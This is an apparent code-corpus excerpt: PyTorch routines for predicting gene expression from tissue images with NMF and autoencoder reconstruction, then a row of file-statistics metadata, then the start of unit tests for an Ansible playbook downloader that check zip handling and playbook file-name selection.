        print(f'now training model on the DS (ds_train) indexed {index}')
        trained_model = train_prediction_model(model_to_train=trained_model, ds_train=ds_train, loss_fn=loss_fn,
                                               optimizer=optimizer, hyperparams=hyperparams,
                                               model_name=model_name, dataset_name=dataset_name, device=device)
    if dataset_name.startswith("single_gene"):
        # perform on TRAIN data
        print("\n## perform on TRAIN data ##")
        M_truth, M_pred = getSingleDimPrediction(dataset=ds_train_list[-1], model=trained_model, device=device)
        # baseline: every entry is the TRAIN truth average
        baseline = np.full(shape=M_truth.shape, fill_value=np.average(M_truth))
        compare_matrices(M_truth, M_pred, Baseline=baseline)
        # BUGFIX: pass ds_train_list[-1] explicitly instead of relying on the
        # loop variable `ds_train` leaking out of the training loop above
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_train_list[-1], M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(ds_train_list[-1], M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        # perform on TEST data
        print("\n## perform on TEST data ##")
        M_truth_test, M_pred_test = getSingleDimPrediction(dataset=ds_test, model=trained_model, device=device)
        # NOTE: shape of TEST data, filled with the TRAIN data average
        baseline = np.full(shape=M_truth_test.shape, fill_value=np.average(M_truth))
        compare_matrices(M_truth_test, M_pred_test, Baseline=baseline) # same baseline as above - the TRAIN baseline
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
    # drop the model reference so GPU memory can be reclaimed
    del trained_model
    # BUGFIX: the exit message previously named the wrong function ("runExperiment")
    print("\n----- finished function runExperiment_mandalay -----")
def runExperiment_mandalay_combined_ds(combined_ds_train : Dataset, ds_test : Dataset, hyperparams, device, model_name, dataset_name):
    '''
    Train one model on a combined (concatenated) training dataset, then
    evaluate it on train data and on `ds_test`.

    NOTE: the LAST element of `combined_ds_train.list_of_datasets` is assumed
    to be "patient1"; it is used both for model construction and for the
    TRAIN-side evaluation (the combined dataset itself is only trained on).
    Currently only the "single_gene" experiment is evaluated here.
    '''
    # BUGFIX: the entry/exit trace messages previously named the wrong
    # function ("runExperiment_mandalay" / "runExperiment") - copy-paste error
    print("\n----- entered function runExperiment_mandalay_combined_ds -----")
    # create the model (configured from the last sub-dataset, assumed "patient1")
    model = get_model_by_name_Mandalay(name=model_name, dataset=combined_ds_train.list_of_datasets[-1], hyperparams=hyperparams)
    # create the loss function and optimizer
    loss_fn = torch.nn.MSELoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=hyperparams['learning_rate'])
    # train once on the whole combined dataset
    trained_model = train_prediction_model(model_to_train=model, ds_train=combined_ds_train, loss_fn=loss_fn,
                                           optimizer=optimizer, hyperparams=hyperparams,
                                           model_name=model_name, dataset_name=dataset_name, device=device)
    if dataset_name.startswith("single_gene"):
        # perform on TRAIN data
        print("\n## perform on TRAIN data ##")
        M_truth, M_pred = getSingleDimPrediction(dataset=combined_ds_train.list_of_datasets[-1], model=trained_model, device=device)
        # baseline: every entry is the TRAIN truth average
        baseline = np.full(shape=M_truth.shape, fill_value=np.average(M_truth))
        compare_matrices(M_truth, M_pred, Baseline=baseline)
        # the single sub-dataset (not the combined one) is what the plot helpers expect
        plot_SingleGene_PredAndTrue_ScatterComparison(combined_ds_train.list_of_datasets[-1], M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(combined_ds_train.list_of_datasets[-1], M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        # perform on TEST data
        print("\n## perform on TEST data ##")
        M_truth_test, M_pred_test = getSingleDimPrediction(dataset=ds_test, model=trained_model, device=device)
        # NOTE: shape of TEST data, filled with the TRAIN data average
        baseline = np.full(shape=M_truth_test.shape, fill_value=np.average(M_truth))
        compare_matrices(M_truth_test, M_pred_test, Baseline=baseline) # same baseline as above - the TRAIN baseline
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
    # drop the model reference so GPU memory can be reclaimed
    del trained_model
    print("\n----- finished function runExperiment_mandalay_combined_ds -----")
def getSingleDimPrediction(dataset, model, device):
    '''
    Predict a single gene's expression value for every image in `dataset`.

    REMINDER: in the 1-dim prediction experiment a single gene was chosen from
    matrix_df and the model was trained so that Predict(one_image) == one y
    value. Here the model is applied to ALL images, batch by batch, giving a
    vector M_pred of shape (num_images,), which is compared against M_truth
    (the ground-truth values from the dataset's reduced dataframe).

    If the dataset is augmented (size_of_dataset != num_of_images_with_no_
    augmentation, i.e. a TRAIN dataset), only the first
    `num_of_images_with_no_augmentation` images are evaluated - the augmented
    copies are skipped. ASSUMPTION: those unaugmented images come first in the
    concatenated image-folder object.

    Returns:
        (M_truth, M_pred) - two 1-D numpy arrays of identical shape.
    '''
    print("\n----- entered function getSingleDimPrediction -----")
    '''
    prepare the data
    '''
    # NOTE: the duplicated "prepare the data" marker block was removed here
    # define the batch size for the dataloader
    batch_size = 25
    dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False) #NOTE: important !!! shuffle here MUST be false or all order is lost !!!
    num_of_batches = 0
    augmented_flag = False
    remainder = -1
    if dataset.size_of_dataset != dataset.num_of_images_with_no_augmentation: # augmented => TRAIN dataset
        num_of_batches = (dataset.num_of_images_with_no_augmentation // batch_size)
        augmented_flag = True
        if (dataset.num_of_images_with_no_augmentation % batch_size) != 0:
            num_of_batches = num_of_batches + 1
            remainder = dataset.num_of_images_with_no_augmentation % batch_size
    else: # not augmented => TEST dataset: use everything
        num_of_batches = (len(dataset) // batch_size)
        if (len(dataset) % batch_size) != 0:
            num_of_batches = num_of_batches + 1
    # iterate the dataloader manually so we can stop after `num_of_batches`
    dl_iter = iter(dataloader)
    y_pred_final = None
    for batch_index in range(num_of_batches):
        with torch.no_grad(): # forward passes only - no gradients needed
            data = next(dl_iter)
            x = data[0] # the image batch; any further tuple elements are unused
            # the LAST batch of an augmented dataset may contain augmented
            # images - keep only the leading `remainder` unaugmented ones
            if batch_index == num_of_batches-1 and augmented_flag and remainder != -1:
                split_result = torch.split(tensor=x, split_size_or_sections=remainder, dim=0) # dim=0 splits on the batch dimension
                x = split_result[0]
            if device.type == 'cuda':
                x = x.to(device=device)
            # predict batch-wise (one full-dataset pass is too heavy for the GPU)
            y_pred = model(x)
            if y_pred_final is None: # first batch
                y_pred_final = y_pred.cpu().detach().numpy()
            else: # stack the new batch's rows under the previous ones
                y_pred_curr_prepared = y_pred.cpu().detach().numpy()
                y_pred_final = np.vstack((y_pred_final, y_pred_curr_prepared))
            # free the batch tensor on the GPU
            del x
    # get M_pred / M_truth and align their shapes
    M_pred = y_pred_final
    M_truth = dataset.reduced_dataframe.to_numpy() # ground-truth values from the original dataframe
    M_truth = M_truth.transpose() #NOTE the transpose here to match the shapes !!!
    M_pred = M_pred.squeeze()
    M_truth = M_truth.squeeze()
    print(f'M_pred.shape {M_pred.shape} ?==? M_truth.shape {M_truth.shape}')
    assert M_pred.shape == M_truth.shape
    ### final print
    print(f'Reached end of the function, printing information about the prediction vs the truth values')
    temp_df = pd.DataFrame({'M_truth':M_truth, 'M_pred':M_pred})
    print(temp_df)
    print("\n----- finished function getSingleDimPrediction -----")
    return M_truth, M_pred
def getKDimPrediction(dataset, model, device):
    '''
    Apply the trained K-gene model to every (unaugmented) image of `dataset`.

    REMINDER: in the K-dim experiment the K highest-variance genes were chosen
    from matrix_df and the model was trained so that Predict(one_image) is a
    (1 x K) vector. This routine predicts for all images and returns the pair
    (M_truth, M_pred), both of shape (num_images, K); M_truth comes from the
    dataset's reduced dataframe (transposed to match M_pred).

    An augmented dataset (a TRAIN dataset, carrying x8 images) is evaluated
    only on its first `num_of_images_with_no_augmentation` images.
    '''
    print("\n----- entered function getKDimPrediction -----")
    # shuffle must stay off - prediction row order has to line up with the dataframe
    batch_size = 20
    loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
    # figure out how many images take part and how many batches that makes
    is_augmented = dataset.size_of_dataset != dataset.num_of_images_with_no_augmentation
    usable_count = dataset.num_of_images_with_no_augmentation if is_augmented else len(dataset)
    leftover = usable_count % batch_size
    num_batches = usable_count // batch_size + (1 if leftover != 0 else 0)
    # only an augmented dataset needs its final batch trimmed (-1 == no trim)
    trim_size = leftover if (is_augmented and leftover != 0) else -1
    prediction_chunks = []
    # forward passes only - no gradient bookkeeping needed
    with torch.no_grad():
        for batch_idx, batch in zip(range(num_batches), loader):
            x, _, _ = batch  # the image batch; the other two elements are unused
            # the final batch of an augmented dataset may contain augmented
            # images - keep only the leading unaugmented ones
            if batch_idx == num_batches - 1 and trim_size != -1:
                x = torch.split(tensor=x, split_size_or_sections=trim_size, dim=0)[0]
            if device.type == 'cuda':
                x = x.to(device=device)
            # predict batch-wise (a single full-dataset pass is too heavy for the GPU)
            prediction_chunks.append(model(x).cpu().detach().numpy())
            # free the batch tensor on the GPU
            del x
    # reassemble the per-batch outputs into one (num_images, K) matrix
    M_pred = prediction_chunks[0] if len(prediction_chunks) == 1 else np.vstack(prediction_chunks)
    # ground truth, transposed so rows are samples like in M_pred
    M_truth = dataset.reduced_dataframe.to_numpy().transpose()
    M_pred = M_pred.squeeze()
    M_truth = M_truth.squeeze()
    assert M_pred.shape == M_truth.shape
    print("\n----- finished function getKDimPrediction -----")
    return M_truth, M_pred
def getFullDimsPrediction_with_NMF_DS(dataset, W, model, device):
    '''
    REMINDER:
    NMF decomposition performs M = W * H
    lets denote M == M_truth
    THIS FUNCTION:
    this function will perform dimension restoration using matrix multiplication:
    if we denote y_pred == H_pred then:
    W * H_pred = M_pred
    and then if we want we can compare M_pred to M_truth
    NOTE !!! in both cases of `dataset` being training or testing dataset,
    W should be from the TRAINING dataset and NOT FROM the TESTING dataset !!!

    :param dataset: project dataset object; exposes `size_of_dataset`,
        `num_of_images_with_no_augmentation` and `matrix_dataframe`.
    :param W: NMF basis matrix - presumably shape (num_features x K); TODO confirm with caller.
    :param model: trained torch model mapping an image batch to K-dim predictions.
    :param device: torch.device on which the forward passes run.
    :return: tuple (M_truth, M_pred) - two numpy arrays of identical shape.
    '''
    print("\n----- entered function getFullDimsPrediction_with_NMF_DS -----")
    # NOTE: shuffle MUST be False or the prediction rows will not line up with
    # the columns of the ground-truth matrix.
    batch_size = 20
    dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
    # If the dataset is augmented (a TRAIN dataset), only the first
    # `num_of_images_with_no_augmentation` images matter for this experiment.
    # ASSUMPTION (from the original code): in an augmented dataset the
    # unaugmented images come first in the concatenated dataset.
    num_relevant_images = dataset.num_of_images_with_no_augmentation
    # Collect per-batch predictions in a list and stack ONCE at the end.
    # (The previous implementation called np.vstack inside the loop, which is
    # O(n^2) because each call copies everything collected so far.)
    prediction_chunks = []
    collected = 0
    with torch.no_grad():  # forward passes only - no gradient bookkeeping needed
        for data in dataloader:
            if collected >= num_relevant_images:
                break  # all unaugmented images already processed
            x, _, _ = data  # x is the image batch; the other fields are not needed here
            # trim the final needed batch so no augmented images are predicted on
            if collected + x.shape[0] > num_relevant_images:
                x = x[:num_relevant_images - collected]
            # load to device
            if device.type == 'cuda':
                x = x.to(device=device)
            # feed data to the model to get the K-dim result
            y_pred = model(x)
            prediction_chunks.append(y_pred.cpu().detach().numpy())
            collected += prediction_chunks[-1].shape[0]
            # delete vectors used from the GPU
            del x
    y_pred_final = np.vstack(prediction_chunks)
    '''
    restore dimension to y_pred by performing: res = W * y_pred = M_pred
    (num_features x K) * (K x num_of_images) = (num_features x num_of_images)
    the number of features (originally 33538) might change due to pre-processing steps
    '''
    y_pred_prepared = y_pred_final.transpose()  # note the transpose: -> (K x num_of_images)
    # get M_pred
    M_pred = np.matmul(W, y_pred_prepared)
    # get M_truth: the full-dimensional matrix from the original dataframe
    M_truth = dataset.matrix_dataframe.to_numpy()
    # squeeze both sides so the shapes can be compared / asserted
    M_pred = M_pred.squeeze()
    M_truth = M_truth.squeeze()
    assert M_pred.shape == M_truth.shape
    print("\n----- finished function getFullDimsPrediction_with_NMF_DS -----")
    return M_truth, M_pred
def getFullDimsPrediction_with_AE_DS(dataset, AEnet, model, device):
    '''
    REMINDER:
    we received our y values from the latent space using the pre-trained encoder
    y_pred was received due to:
    note that y_pred == Predict(X)
    THIS FUNCTION:
    this function will perform dimension restoration using the decoder
    we denote Decode(y_pred) == Decode(Predict(X)) == M_pred
    and M_truth as the original matrix
    and then if we want we can compare M_pred to M_truth
    NOTE !!! in both cases of `dataset` being training or testing dataset,
    AEnet should be from the TRAINING dataset and NOT FROM the TESTING dataset !!!

    :param dataset: project dataset object; exposes `size_of_dataset`,
        `num_of_images_with_no_augmentation` and `matrix_dataframe`.
    :param AEnet: pre-trained autoencoder exposing `decodeWrapper`.
    :param model: trained torch model mapping an image batch to latent predictions.
    :param device: torch.device on which the forward passes run.
    :return: tuple (M_truth, M_pred) - two numpy arrays of identical shape.
    '''
    print("\n----- entered function getFullDimsPrediction_with_AE_DS -----")
    # NOTE: batch_size must stay 1 to correlate with the way the AE net was
    # trained - see "return_trained_AE_net" in loadAndPreProcess.py.
    batch_size = 1
    # NOTE: shuffle MUST be False or the prediction order will not match M_truth
    dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
    # If the dataset is augmented (a TRAIN dataset), only the first
    # `num_of_images_with_no_augmentation` images matter for this experiment.
    # ASSUMPTION (from the original code): the unaugmented images come first.
    num_relevant_images = dataset.num_of_images_with_no_augmentation
    # Collect per-batch decoded predictions and stack ONCE at the end.
    # (The previous implementation called np.vstack inside the loop - O(n^2).)
    prediction_chunks = []
    collected = 0
    with torch.no_grad():  # forward passes only - no gradients needed
        for data in dataloader:
            if collected >= num_relevant_images:
                break  # all unaugmented images already processed
            x, _, _ = data  # x is the image batch; the other fields are not needed here
            # trim the final needed batch so no augmented images are predicted on
            if collected + x.shape[0] > num_relevant_images:
                x = x[:num_relevant_images - collected]
            # load to device
            if device.type == 'cuda':
                x = x.to(device=device)
            # feed data to the model to get the latent (K-dim) result
            y_pred = model(x)
            # restore the full dimension via the pre-trained autoencoder's decoder
            y_pred_decoded = AEnet.decodeWrapper(y_pred)
            prediction_chunks.append(y_pred_decoded.cpu().detach().numpy())
            collected += prediction_chunks[-1].shape[0]
            # delete vectors used from the GPU
            del x
    y_pred_final = np.vstack(prediction_chunks)
    '''
    finish up: align shapes with M_truth and compare
    '''
    M_pred = y_pred_final.transpose()  # NOTE the transpose - it aligns shapes with M_truth
    # get M_truth: the full-dimensional matrix from the original dataframe
    M_truth = dataset.matrix_dataframe.to_numpy()
    # squeeze both sides so the shapes can be compared / asserted
    M_pred = M_pred.squeeze()
    M_truth = M_truth.squeeze()
    assert M_pred.shape == M_truth.shape
    print("\n----- finished function getFullDimsPrediction_with_AE_DS -----")
    return M_truth, M_pred
def getAutoEncoder_M_fast_reconstruction(dataset, model, device):
    '''
    perform a fast encoding+decoding pass over the matrix dataframe using the
    already-trained AE net - without any further training.

    :param dataset: project dataset object; exposes `dataset_from_matrix_df`,
        `autoEncoder`, `num_of_images_with_no_augmentation` and `matrix_dataframe`.
    :param model: NOTE(review): not used by this function (the autoencoder is
        taken from `dataset.autoEncoder`) - kept for signature compatibility.
    :param device: torch.device on which the forward passes run.
    :return: M_fast_reconstruction - numpy array with the same shape as the
        original matrix dataframe.
    '''
    print("\n----- entered function getAutoEncoder_M_fast_reconstruction -----")
    # NOTE: batch_size must stay 1 to correlate with the way the AE net was
    # trained - see "return_trained_AE_net" in loadAndPreProcess.py.
    batch_size = 1
    # NOTE: the dataloader iterates the matrix-dataframe dataset (each item is
    # one feature vector), NOT the image dataset. shuffle MUST stay False.
    dataloader = DataLoader(dataset.dataset_from_matrix_df, batch_size=batch_size, shuffle=False)
    # If the dataset is augmented (a TRAIN dataset), only the first
    # `num_of_images_with_no_augmentation` rows matter for this experiment.
    num_relevant_rows = dataset.num_of_images_with_no_augmentation
    # Collect per-batch reconstructions and stack ONCE at the end.
    # (The previous implementation called np.vstack inside the loop - O(n^2).)
    reconstruction_chunks = []
    collected = 0
    with torch.no_grad():  # forward passes only - no gradients needed
        for x in dataloader:
            if collected >= num_relevant_rows:
                break  # all relevant rows already processed
            # "end='\r'" overwrites the line on the next print (no effect in a text file)
            print(f'batch {collected+1} of {num_relevant_rows} batches', end='\r')
            x = x.float()  # needed to avoid dtype conversion errors
            # trim the final needed batch so no augmented rows slip in
            if collected + x.shape[0] > num_relevant_rows:
                x = x[:num_relevant_rows - collected]
            # load to device
            if device.type == 'cuda':
                x = x.to(device=device)
            # encode and then decode through the pre-trained autoencoder
            y_pred_encoded = dataset.autoEncoder.encodeWrapper(x)
            y_pred_decoded = dataset.autoEncoder.decodeWrapper(y_pred_encoded)
            reconstruction_chunks.append(y_pred_decoded.cpu().detach().numpy())
            collected += reconstruction_chunks[-1].shape[0]
            # delete vectors used from the GPU
            del x
    result = np.vstack(reconstruction_chunks)
    '''
    finish up
    '''
    M_fast_reconstruction = result.transpose()  # NOTE the transpose - it aligns shapes with M_truth
    # assert equal sizes with the original matrix
    assert M_fast_reconstruction.shape == dataset.matrix_dataframe.to_numpy().shape
    print("\n----- finished function getAutoEncoder_M_fast_reconstruction -----")
    return M_fast_reconstruction
def get_model_by_name(name, dataset, hyperparams):
    '''
    Build a model by architecture name, with input/output sizes taken from the dataset.

    :param name: one of 'BasicConvNet', 'DensetNet121' (sic), 'Inception_V3'.
    :param dataset: dataset whose __getitem__ returns (x, y, column); the third
        element ("column") is not needed here.
    :param hyperparams: dict with 'channels', 'pool_every', 'hidden_dims'
        (used only for 'BasicConvNet').
    :return: an untrained torch model sized for the dataset.
    :raises ValueError: if `name` is not a known architecture
        (previously the function silently returned None).
    '''
    x0, y0, _ = dataset[0]
    in_size = x0.shape  # note: to add a batch dimension use x0.unsqueeze(0) if ever needed
    # if y0 is a scalar the target size is 1; otherwise it is K == y0.shape[0]
    # (computed once here instead of being duplicated in every branch)
    output_size = 1 if isinstance(y0, (int, float)) else y0.shape[0]
    if name == 'BasicConvNet':
        return ConvNet(in_size, output_size, channels=hyperparams['channels'],
                       pool_every=hyperparams['pool_every'], hidden_dims=hyperparams['hidden_dims'])
    elif name == 'DensetNet121':  # (typo kept: callers pass this exact string)
        # explanation of all models in: https://pytorch.org/docs/stable/torchvision/models.html
        model = torchvision.models.densenet121(pretrained=False)
        # replace the classifier head so it matches our output size, zero-initialized
        model.classifier = torch.nn.Linear(model.classifier.in_features, output_size, bias=True)
        model.classifier.weight.data.zero_()
        model.classifier.bias.data.zero_()
        return model
    elif name == 'Inception_V3':
        # explanation of all models in: https://pytorch.org/docs/stable/torchvision/models.html
        print(f'starting to load the model inception_v3 from torchvision.models. this is quite heavy, and might take some time ...')
        model = torchvision.models.inception_v3(pretrained=False)
        print(f'finished loading model')
        # replace the fc head so it matches our output size, zero-initialized
        model.fc = torch.nn.Linear(model.fc.in_features, output_size, bias=True)
        model.fc.weight.data.zero_()
        model.fc.bias.data.zero_()
        return model
    # fail loudly instead of silently returning None for unknown names
    raise ValueError(f'get_model_by_name: unknown model name {name!r}')
def get_model_by_name_Mandalay(name, dataset, hyperparams):
    '''
    Build a model by architecture name for the Mandalay flow, with input/output
    sizes taken from the dataset. Identical to get_model_by_name except that the
    dataset items are (x, y) pairs (no third "column" element).

    :param name: one of 'BasicConvNet', 'DensetNet121' (sic), 'Inception_V3'.
    :param dataset: dataset whose __getitem__ returns (x, y).
    :param hyperparams: dict with 'channels', 'pool_every', 'hidden_dims'
        (used only for 'BasicConvNet').
    :return: an untrained torch model sized for the dataset.
    :raises ValueError: if `name` is not a known architecture
        (previously the function silently returned None).
    '''
    x0, y0 = dataset[0]
    in_size = x0.shape  # note: to add a batch dimension use x0.unsqueeze(0) if ever needed
    # if y0 is a scalar the target size is 1; otherwise it is K == y0.shape[0]
    # (computed once here instead of being duplicated in every branch)
    output_size = 1 if isinstance(y0, (int, float)) else y0.shape[0]
    if name == 'BasicConvNet':
        return ConvNet(in_size, output_size, channels=hyperparams['channels'],
                       pool_every=hyperparams['pool_every'], hidden_dims=hyperparams['hidden_dims'])
    elif name == 'DensetNet121':  # (typo kept: callers pass this exact string)
        # explanation of all models in: https://pytorch.org/docs/stable/torchvision/models.html
        model = torchvision.models.densenet121(pretrained=False)
        # replace the classifier head so it matches our output size, zero-initialized
        model.classifier = torch.nn.Linear(model.classifier.in_features, output_size, bias=True)
        model.classifier.weight.data.zero_()
        model.classifier.bias.data.zero_()
        return model
    elif name == 'Inception_V3':
        # explanation of all models in: https://pytorch.org/docs/stable/torchvision/models.html
        print(
            f'starting to load the model inception_v3 from torchvision.models. this is quite heavy, and might take some time ...')
        model = torchvision.models.inception_v3(pretrained=False)
        print(f'finished loading model')
        # replace the fc head so it matches our output size, zero-initialized
        model.fc = torch.nn.Linear(model.fc.in_features, output_size, bias=True)
        model.fc.weight.data.zero_()
        model.fc.bias.data.zero_()
        return model
    # fail loudly instead of silently returning None for unknown names
    raise ValueError(f'get_model_by_name_Mandalay: unknown model name {name!r}')
def get_Trained_AEnet(dataset_from_matrix_df, z_dim, num_of_epochs, device):
    '''
    trains the AE net on the matrix dataframe
    returns the trained autoencoder model

    :param dataset_from_matrix_df: dataset whose __getitem__ returns one feature vector.
    :param z_dim: dimension of the autoencoder's latent space.
    :param num_of_epochs: number of full passes over the dataset.
    :param device: torch.device to train on.
    :return: the trained AutoencoderNet model.
    '''
    print("\n----- entered function return_trained_AE_net -----")
    '''
    prep our dataset and dataloaders
    '''
    # IMPORTANT NOTE ON THE BATCH SIZE !!!
    # batch_size must stay 1: if it is not 1 the AE's encoder network cannot be
    # used from __get_item__ (the end goal of this model), which serves exactly
    # one item at a time. (A larger batch also caused CUDA OUT OF MEMORY on a
    # busy server.) TODO: later on, this can be improved.
    batch_size = 1
    dataset = dataset_from_matrix_df
    dataloader = DataLoader(dataset, batch_size, shuffle=True)  # note the shuffle, note the num of workers (none==0) !!!
    num_of_features = len(dataset[0])
    '''
    prepare model, loss and optimizer instances
    '''
    # hidden linear-layer sizes scale with z_dim (first and last layers excluded)
    # TODO: change code to get this value from the user (hyperparams dictionary in the notebook)?
    connected_layers_dim_list = [100*z_dim, 10*z_dim, 5*z_dim]
    print(f'note - number of (hidden) linear layers is supposed to be {len(connected_layers_dim_list)}')
    model = AutoencoderNet(in_features=num_of_features, connected_layers_dim_list=connected_layers_dim_list, z_dim=z_dim, batch_size=batch_size, device=device)
    if device.type == 'cuda':
        model = model.to(device=device)
    # loss and optimizer
    loss_fn = torch.nn.MSELoss()
    learning_rate = 1e-4  # TODO: change code to get this value from the user (hyperparams dictionary)?
    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
    '''
    now we can perform the training
    '''
    print("****** begin training ******")
    # optional cap on batches per epoch: speeds up training at the cost of accuracy
    max_alowed_number_of_batches = 999999
    num_of_batches = len(dataset) // batch_size
    if num_of_batches > max_alowed_number_of_batches:
        print(f'NOTE: in order to speed up training (while damaging accuracy) the number of batches per epoch was reduced from {num_of_batches} to {max_alowed_number_of_batches}')
        num_of_batches = max_alowed_number_of_batches
    elif (len(dataset) % batch_size) != 0:
        # include the final partial batch that "//" above would drop
        num_of_batches = num_of_batches + 1
    loss_value_averages_of_all_epochs = []
    # note 2 loops here: epochs (external) and batches (internal)
    for iteration in range(num_of_epochs):
        print(f'iteration {iteration+1} of {num_of_epochs} epochs')  # this should be commented in notebook
        loss_values_list = []
        # iterate the dataloader directly; the old iter()/next() pattern could
        # raise StopIteration if the batch count was ever miscomputed
        for batch_index, data in enumerate(dataloader):
            if batch_index >= num_of_batches:
                break  # honor the per-epoch batch cap
            x = data.float()  # needed to avoid errors of conversion
            if device.type == 'cuda':
                x = x.to(device=device)
            # Forward pass: reconstruct x through the autoencoder
            x_reconstructed = model(x)
            # Compute the reconstruction loss
            loss = loss_fn(x_reconstructed, x)
            loss_values_list.append(loss.item())
            # Gradients accumulate in buffers by default whenever .backward()
            # is called - zero them before the backward pass
            optimizer.zero_grad()
            # Backward pass: compute gradient of the loss w.r.t. model parameters
            loss.backward()
            # Update the parameters
            optimizer.step()
            # Delete the unneeded vectors to free up space in the GPU
            del x, x_reconstructed
        # record this epoch's average loss for the convergence plot
        average_value_this_epoch = np.mean(loss_values_list)
        loss_value_averages_of_all_epochs.append(average_value_this_epoch)
    print(f'finished all epochs ! ')  # spaces ARE intended
    print(f'which means, that this model is now trained.')
    print(f'plotting the loss convergence for the training of this model: ')
    plot_loss_convergence(loss_value_averages_of_all_epochs, model_name='AE', dataset_name='matrix_dataframe train')
    print("\n----- finished function return_trained_AE_net -----\n")
    # return the trained model
    return model
| 55.013721
| 353
| 0.65271
| 9,281
| 68,162
| 4.581942
| 0.065618
| 0.0206
| 0.018624
| 0.015991
| 0.881623
| 0.860858
| 0.852181
| 0.845291
| 0.839153
| 0.818436
| 0
| 0.009113
| 0.267495
| 68,162
| 1,238
| 354
| 55.058158
| 0.842596
| 0.37474
| 0
| 0.748188
| 0
| 0.007246
| 0.122499
| 0.022188
| 0
| 0
| 0
| 0.008885
| 0.009058
| 1
| 0.021739
| false
| 0.007246
| 0.023551
| 0
| 0.068841
| 0.121377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dffde2551049dbffe59debf25781a29d28813da
| 8,634
|
py
|
Python
|
package/tests/test_playbook_downloader.py
|
IngaAl/Ansible-Shell
|
73113c6317c96b1d5e4109e44b3029dccc828919
|
[
"Apache-2.0"
] | 1
|
2016-12-29T14:14:39.000Z
|
2016-12-29T14:14:39.000Z
|
package/tests/test_playbook_downloader.py
|
IngaAl/Ansible-Shell
|
73113c6317c96b1d5e4109e44b3029dccc828919
|
[
"Apache-2.0"
] | 85
|
2016-12-21T12:58:14.000Z
|
2022-03-29T21:53:30.000Z
|
package/tests/test_playbook_downloader.py
|
IngaAl/Ansible-Shell
|
73113c6317c96b1d5e4109e44b3029dccc828919
|
[
"Apache-2.0"
] | 4
|
2016-12-09T22:41:13.000Z
|
2022-02-02T12:09:16.000Z
|
from unittest import TestCase
from mock import Mock, patch
from cloudshell.cm.ansible.domain.filename_extractor import FilenameExtractor
from cloudshell.cm.ansible.domain.http_request_service import HttpRequestService
from cloudshell.cm.ansible.domain.playbook_downloader import PlaybookDownloader, HttpAuth
from tests.mocks.file_system_service_mock import FileSystemServiceMock
class TestPlaybookDownloader(TestCase):
def setUp(self):
self.zip_service = Mock()
self.http_request_serivce = HttpRequestService()
self.file_system = FileSystemServiceMock()
self.filename_extractor = FilenameExtractor()
self.playbook_downloader = PlaybookDownloader(self.file_system, self.zip_service, self.http_request_serivce, self.filename_extractor)
self.logger = Mock()
self.logger.info = lambda msg: ""
self.reqeust = Mock()
def _set_extract_all_zip(self, files_to_create):
for file_to_create in files_to_create:
self.file_system.create_file(file_to_create)
return files_to_create
def test_playbook_downloader_zip_file_one_yaml(self):
self.zip_service.extract_all = lambda zip_file_name: self._set_extract_all_zip(["lie.yaml"])
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.zip"
dic = dict([('content-disposition', 'lie.zip')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response=Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_zip_file_two_yaml_correct(self):
self.zip_service.extract_all = lambda zip_file_name: self._set_extract_all_zip(["lie.yaml", "site.yaml"])
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.zip"
dic = dict([('content-disposition', 'lie.zip')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "site.yaml")
def test_playbook_downloader_zip_file_two_yaml_incorrect(self):
self.zip_service.extract_all = lambda zip_file_name: self._set_extract_all_zip(["lie.yaml", "lie2.yaml"])
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.zip"
dic = dict([('content-disposition', 'lie.zip')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
with self.assertRaises(Exception) as e:
self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(str(e.exception),"Playbook file name was not found in zip file")
def test_playbook_downloader_with_one_yaml(self):
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml')])
self.reqeust.headers = dic
